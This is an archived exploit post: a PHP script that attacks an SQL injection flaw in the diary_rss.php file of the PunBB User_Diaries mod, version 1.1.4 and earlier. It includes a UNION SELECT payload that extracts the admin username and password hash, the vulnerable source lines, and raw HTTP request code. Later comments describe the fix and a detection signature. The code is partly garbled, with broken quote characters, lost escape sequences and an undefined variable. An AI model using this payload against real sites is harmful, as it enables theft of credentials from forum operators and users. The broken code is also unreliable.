PunBB Mod User_Diaries <= 1.1.4 (diary_rss.php) Sql Injection Exploit
=====================================================================
PunBB Mod User_Diaries <= 1.1.4 (diary_rss.php) Sql Injection Exploit
=====================================================================
#!/usr/bin/php
<?PHP
// E_STRICT ^ E_WARNING XORs two distinct bits, so only warnings and strict
// notices are reported; E_NOTICE (e.g. undefined variables) stays silent.
error_reporting(E_STRICT ^ E_WARNING);
/*
———————————————————————
PunBB Mod User_Diaries <= 1.1.4 "diary_rss.php" sql injection exploit
———————————————————————
download: http://www.punres.org/files.php?pid=467
by staker[at]hotmail[dot]it
———————————————————————
[*] http://[example]/diary_rss.php?id=0+UNION+SELECT+1,CONCAT_WS(0×3a,username,password),3,4,5,6,7,8,9+FROM+foo_users+WHERE+id=2#
[EXPLANATION / NOTE: it works regardless of php.ini settings — the id value sits in numeric SQL context with no quotes, so quote-escaping such as magic_quotes_gpc is no protection; only an integer cast or a bound parameter is.]
————————————————————-
{1} $user_id is assigned the raw $_GET['id'] value.
{2} $user_id is concatenated into the $where clause.
{3} the query appends it verbatim: users AS r ON u.poster_id=r.id".$where." — there is no escaping and no quoting, so the value is interpreted as SQL.
————————————————————-
[file: diary_rss.php | line: 69-83]
if (!empty($_GET["id"]))
{
$user_id = $_GET["id"]; <—- {1}
$where = " WHERE u.poster_id = ".$user_id; <—- {2}
}
else
{
$user_id = '';
$where = '';
}
$result = $db->query("
SELECT u.id, r.username, u.poster, u.poster_id, u.poster_ip, u.message, u.posted, u.entry_date,
u.image_ext FROM ".$db->prefix."diary as u LEFT JOIN ".$db->prefix."users AS
r ON u.poster_id=r.id".$where." ORDER BY u.posted DESC LIMIT 0,20 <——- {3}
") or error('Unable to fetch diary entries', __FILE__, __LINE__, $db->error());
*********************************************************************************/
// Banner printed before anything else happens.
echo(‘
———————————————————————
PunBB Mod User_Diaries <= 1.1.4 "diary_rss.php" sql injection exploit
———————————————————————-
by staker[at]hotmail[dot]it
‘);
// Positional CLI arguments: target host and the forum's web root path.
$host = $argv[1];
$path = $argv[2];
$pre = "punbb_"; // default table_prefix.
$uid = 2; // default id (admin)
// Value sent as the id parameter. It is numeric-context SQL (no quotes), which
// is why quote-escaping such as magic_quotes_gpc does not stop it; the fix in
// diary_rss.php is to cast $_GET['id'] to int or bind it as a parameter.
// For detection: "UNION", "CONCAT_WS" or "%23" inside the id parameter of a
// diary_rss.php request is the signature to alert on.
$sql = ‘0+UNION+SELECT+1,CONCAT_WS(0×3a,username,password),3,4,5,6,7′.
",8,9+FROM+{$pre}users+WHERE+id={$uid}%23";
if ($argc != 3) {
die ("Usage: php diary.php localhost /punbb/n");
}
// Hand-built HTTP/1.1 request. The "rn"/"n" fragments look like CRLF/LF escape
// sequences lost in the page's extraction — do not copy them literally into a
// signature. The fixed User-Agent string is another log indicator.
$packet = "GET {$path}/diary_rss.php?id={$sql} HTTP/1.1rn".
"Host: {$host}rn".
"User-Agent: Lynx (textmode)rn".
"Connection: closernrn";
// When the injected query succeeds, the RSS <title> element carries the
// CONCAT_WS() output; the matched text is split on a quote character and
// element 1 is printed. Any other response is reported as a failure.
if (preg_match(‘/<title>(.+?)</title>/’,data_send($target,$packet),$content)) {
$array = explode("’",$content[0]);
print "Result: $array[1]n";
}
else {
echo "Exploit failedn";
}
/**
 * Write a raw HTTP request over a plain TCP socket on port 80 and return the
 * whole response (headers and body) read until EOF.
 *
 * @param string $host hostname handed straight to fsockopen()
 * @param string $data the complete request text to send
 * @return string the raw response text
 */
function data_send ($host,$data) {
// fsockopen() failures are suppressed with @ and turned into a die().
if (!$sock = @fsockopen($host,80)) {
die("Connection refused,try again!n");
} fputs($sock,$data);
// $html is never initialised before the .= ; with the error_reporting mask
// set at the top of the script the resulting notice is silent.
while (!feof($sock)) { $html .= fgets($sock); }
fclose($sock);
return $html;
}
?>
# Inj3ct0r.com [2010-07-30]
Source: http://inj3ct0r.com/exploits/13519
